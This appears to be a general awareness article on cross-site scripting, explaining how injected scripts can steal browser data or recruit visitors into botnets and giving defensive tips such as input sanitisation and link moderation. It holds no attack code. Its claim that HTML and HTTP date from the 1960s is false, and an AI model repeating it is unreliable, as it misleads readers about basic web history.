Cross Site Scripting, or XSS, is a popular attack vector but why is it such a problem and what can you do to avoid becoming a victim?
Basically, XSS is a code vulnerability in a website that allows an attacker to inject malicious client-side scripts into a web page. When you visit a site that has been compromised by a XSS attack, you will inadvertently execute code that could be downloading malware, copying your personal information, or using your computer to perpetuate further attacks.
While most won’t look at the scripting details of a website, understanding the ramifications of XSS are extremely important, given then popularity of wikis and web 2.0 content that is constantly updated and changed. In order to be interactive, they require a high degree of input from the user, space for this type of content, like comment boxes, etc. can be a place for attackers to inject code that will download malware to a visitor or enslave their computer to a botnet. Therefore, it is hard to monitor an “open” area of the website and continually update and review their websites.
XSS code can even appear on the web page, in banner ads, even as part of the URL; and if it’s a site that is visited regularly, users will as good as submit themselves to the attacker. Because XSS is code that runs on the client side, it has access to anything that the JavaScript has access to on the browser, such as cookies that store information about browsing history.
One of the real concerns about XSS is that by downloading script on a client-side computer, that endpoint can become enslaved into a botnet, or group of computers that have been infected with malware in order to allow a third party to control them, and used to participate in denial of service attacks. Users might not even be aware that they are part of an attack.
The range of what can be accomplished is huge- malware can be inserted into a legitimate website, turning it into a watering hole that can infect a visitor’s computer; and this can impact anyone. Once the XSS is put into a website, then the user becomes a victim and the attacker has is all of information that the browser has.
In terms of preventing XSS; firstly, the hole in the website that has been exploited has to be closed. The main tactic to prevent XSS code running on your website is to make sure you are ‘locking all the doors’ and reviewing your website code regularly to remove bugs and any vulnerabilities. If you are doing it properly, it should be a continual process. If a website has malware on it due to the owner not reviewing it regularly, then attackers will be able alter the malicious code to dominate the page and infect more visitors.
You can limit the chances of getting malicious code on your website by routinely auditing the website for unintended JavaScript inclusions. But with XSS, especially non-persistent XSS, the best thing is to validate all data coming in, don’t include any supporting language and make sure what is coming in is sanitised, or checked for malicious code. This is especially true for parts of your website that get regular updates, like comment sections. It is not enough to just assume that because it clean before, new updates will also be also be clear.
Even if you are following proper security coding and go through code reviews, websites are sometimes up for six months with no changes made, so vulnerability testing is important because new bugs will continue to come up. Remember, HTTP and HTML are full of potential vulnerabilities as the HTML protocol was written in the 1960s; it was never imagined it to be what it has become. If you do not consider XSS when writing a website, then you will inevitably write a website full of holes.
Top three tips to avoid becoming a victim of XSS:
- Review your website and sanitise your code regularly to ensure there is no malicious code or holes where code can be inserted.
- Consider not allowing comments to host external links, or make sure you approve those links before they are published to prevent code from being inserted.
- View your web traffic in and out of your website for signs of unusual behaviour.
